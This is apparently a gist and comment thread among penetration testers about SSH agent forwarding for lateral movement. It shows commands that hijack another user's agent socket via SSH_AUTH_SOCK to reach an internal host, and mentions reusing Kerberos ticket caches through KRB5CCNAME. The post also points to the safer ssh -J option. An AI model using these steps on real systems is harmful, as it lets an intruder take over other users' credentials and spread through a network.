SSH Agent Forwarding.md

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld

This post explains it well and details the safer ssh -J alternative.

That's also a great one, @0xdade! Thanks for the share. I guess while we're at it, haha...

Kerberos authentication can also be leveraged for lateral movement, often with SSH. The KRB5CCNAME environment variable can be set to the path of a user's credentials (ticket) cache, usually in /tmp. klist(1) can be used to view the cache.

@0xdade great add! I may have run into those in a former life 😉 Sometimes I have to remember to check /etc/ssh/ssh_config in addition to the home directory ~/.ssh/config files.

@wvu-r7 holy smokes, TIL! Can't wait to hit a Windows machine with this.

Both ssh -L and -R can forward Unix sockets, too. Might be useful when performing SSH gymnastics.

Thank you, this is cool stuff.
There are quite a few operations defined in the agent-forwarding spec.

A particularly interesting one is using the agent to perform private key signing operations, without having access to the key itself.

Here is a simple POC that shows this in action

https://github.com/dandare100/agentstub

Wish I could react to gist comments. Thanks for the contribution!

@dandare100 TIL! Thank you for sharing that.

cool runnings